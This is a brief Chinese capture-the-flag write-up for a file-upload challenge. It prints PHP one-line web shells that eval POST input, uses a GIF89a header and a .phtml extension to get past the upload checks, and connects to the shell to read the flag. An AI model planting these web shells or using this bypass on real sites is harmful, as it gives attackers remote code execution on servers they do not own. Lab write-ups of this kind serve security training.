随意上传,得到:
我们尝试上传php、图片,其他文件都不行!?
一句话木马,同上
<script language='php'>eval($_POST['shell']);</script>
GIF89a
<script language="php">eval($_POST['aa']);</script>
木马种类很多,大家都可以试试!(GIF89a是为了绕过Content-Type)
用shell.phtml直接上传,就是酱!
因此我们需要修改文件后缀,只要是图片就行 (文件换头术)
上传成功,说明我们绕过了检测,重新上传后继续抓包,修改文件后缀为phtml
放包!!!
在unload路径之下访问shell.phtml文件
上传成功后,访问文件
访问成功,打开蚁🗡连接
文件很多,直接返回根目录,或者打开终端用cat/flag查找flag